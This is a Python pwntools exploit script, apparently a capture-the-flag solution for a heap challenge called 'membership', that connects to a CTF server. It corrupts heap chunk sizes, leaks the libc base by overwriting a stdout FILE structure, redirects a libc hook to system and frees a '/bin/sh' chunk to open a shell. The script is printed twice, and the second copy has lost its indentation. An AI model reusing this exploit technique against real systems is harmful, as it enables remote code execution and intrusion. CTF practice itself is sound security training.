hkraw/membership.py

## membership.py
from pwn import *
from past.builtins import xrange

def a():
    io.sendlineafter(')\n>','1')

def e(idx, data):
    io.sendlineafter(')\n>','3')
    io.sendlineafter('Index: ',str(idx))
    io.sendafter('Content: ',data)

def d(idx):
    io.sendlineafter(')\n>','2')
    io.sendlineafter('Index: ',str(idx))

if __name__=='__main__':
#    io = process('./membership') #,env={'LD_PRELOAD':'./libc.so.6'})
    io = remote('bin.q21.ctfsecurinets.com', 1339)

    for i in xrange(13): a()
    e(12, b'A'*0x18 + p64(0x41))
    d(2)
    d(1)
    e(1, "\x20")
    a() #1
    a() #2
    e(1, b'A'*0x18 + p64(0x421))
    d(2)
    e(1, b'A'*0x18 + p64(0x421) + p16(0x16a0))
    d(3)
    d(5)
    d(1)
    d(4)
    e(4, "\x20")
    a() #1
    a() #2
    a() #3
    e(3, p64(0xfbad1800) + p64(0)*3 + b'\0')
    libc_base = u64(io.recvline()[8:16]) - 0x1eb980
    print(f'[+] Libc base: {hex(libc_base)}')
    d(1)
    e(1, p64(libc_base + 0x1eeb20))
    a()
    a()
    e(4, b'/bin/sh\0'+p64(libc_base + 0x55410))
    d(4)
    io.interactive()
	from pwn import *
	from past.builtins import xrange

	def a():
	io.sendlineafter(')\n>','1')

	def e(idx, data):
	io.sendlineafter(')\n>','3')
	io.sendlineafter('Index: ',str(idx))
	io.sendafter('Content: ',data)

	def d(idx):
	io.sendlineafter(')\n>','2')
	io.sendlineafter('Index: ',str(idx))

	if __name__=='__main__':
	# io = process('./membership') #,env={'LD_PRELOAD':'./libc.so.6'})
	io = remote('bin.q21.ctfsecurinets.com', 1339)

	for i in xrange(13): a()
	e(12, b'A'*0x18 + p64(0x41))
	d(2)
	d(1)
	e(1, "\x20")
	a() #1
	a() #2
	e(1, b'A'*0x18 + p64(0x421))
	d(2)
	e(1, b'A'*0x18 + p64(0x421) + p16(0x16a0))
	d(3)
	d(5)
	d(1)
	d(4)
	e(4, "\x20")
	a() #1
	a() #2
	a() #3
	e(3, p64(0xfbad1800) + p64(0)*3 + b'\0')
	libc_base = u64(io.recvline()[8:16]) - 0x1eb980
	print(f'[+] Libc base: {hex(libc_base)}')
	d(1)
	e(1, p64(libc_base + 0x1eeb20))
	a()
	a()
	e(4, b'/bin/sh\0'+p64(libc_base + 0x55410))
	d(4)
	io.interactive()